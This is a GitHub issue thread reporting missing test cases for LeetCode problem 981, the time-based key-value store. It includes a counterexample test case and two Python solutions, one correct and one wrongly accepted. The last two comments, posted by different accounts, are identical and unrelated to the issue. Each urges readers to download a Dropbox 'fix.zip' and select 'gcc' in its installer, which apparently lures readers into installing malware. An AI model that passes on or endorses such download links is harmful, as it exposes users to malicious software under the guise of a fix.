### ISSUE TITLE
[BUG] - Missing constraint/test cases #981

### ISSUE THREAD

**Issue by reach-will** [LeetCode-Feedback/LeetCode-Feedback#23696]
### LeetCode Username

will-mach

### Problem Number, Title, and Link

981. Time Based Key-Value Store https://leetcode.com/problems/time-based-key-value-store/

### Bug Category

Problem description, Problem constraints, Missing test case *(Incorrect/Inefficient Code getting accepted because of missing test cases)*

### Bug Description

Missing test cases (or missing constraint in problem description): there's not a single test case with a call to "get" in a "strictly decreasing" fashion, i.e., a call to "get" with a timestamp "x" and a call to "get" with a timestamp "y", sometime after, where y < x. It has come to my attention that the problem did mention that "All the timestamps `timestamp` of `set` are strictly increasing.", but no mention of the calls to "get" following the same constraint, contrary to what the test cases are currently testing for (basically the test cases follow a constraint on the `get` calls that is never explicitly mentioned, thus misleading the reader).

Alternatives:
Change the problem statement to include either of these in the constraints:
- All the timestamps `timestamp` of `get` are increasing. (this suffices)
- All the timestamps `timestamp` of `get` are strictly increasing. (this is stronger and similar to the constraint on the calls to `set`)

OR

Add test cases where calls to get are strictly decreasing to correctly test all cases:
["TimeMap","set","get","get","set","get","get"]
[[],["foo","bar",1],["foo",1],["foo",3],["foo","bar2",4],["foo",4],["foo",3]]

Working code with the new test case and assuming current constraints:

```python
class TimeMap:

    def __init__(self):
        self.map_timestamps = defaultdict(list)

    def set(self, key: str, value: str, timestamp: int) -> None:
        self.map_timestamps[key].append((timestamp, value))

    def get(self, key: str, timestamp: int) -> str:
        closest_timestamp_index = bisect.bisect(self.map_timestamps[key], timestamp, key=itemgetter(0))
        if closest_timestamp_index == 0:
            return ""
        return self.map_timestamps[key][closest_timestamp_index - 1][1]

# Your TimeMap object will be instantiated and called as such:
# obj = TimeMap()
# obj.set(key,value,timestamp)
# param_2 = obj.get(key,timestamp)
```

### Language Used for Code

Python/Python3

### Code used for Submit/Run operation

```bash
from collections import deque
from typing import Deque, Dict, Tuple

class TimeMap:

    def __init__(self):
        self.m: Dict[str, Deque[Tuple[str, int]]] = {}

    def set(self, key: str, value: str, timestamp: int) -> None:
        if key not in self.m:
            self.m[key] = deque()
        self.m[key].append((value, timestamp))

    def get(self, key: str, timestamp: int) -> str:
        if key not in self.m:
            return ""
        ret = ""
        while self.m[key] and self.m[key][0][1] <= timestamp:
            ret = self.m[key].popleft()[0]
        if ret:
            self.m[key].appendleft((ret, timestamp))
        return ret
```

### Expected behavior

I expected it to fail a test case in the submission since the problem had no constraints whatsoever in the calls to `get`, but the solution worked, even though it assumes the calls to `get` have "increasing" timestamps according to their indices (i.e., if get_index_y > get_index_x, timestamp_y >= timestamp_x).

Here's one sample test case that follows the original problem's constraints that this code clearly fails on:
["TimeMap","set","get","get","set","get","get"]
[[],["foo","bar",1],["foo",1],["foo",3],["foo","bar2",4],["foo",4],["foo",3]]

### Screenshots

![Screenshot from 2024-08-25 21-24-52](https://github.com/user-attachments/assets/5b0c87bc-af2b-4b6a-bc3a-35edd7dca2fd)

### Additional context

["TimeMap","set","get","get","set","get","get"]
[[],["foo","bar",1],["foo",1],["foo",3],["foo","bar2",4],["foo",4],["foo",3]]

**Comment by seeronline** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by Wanderx13** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."
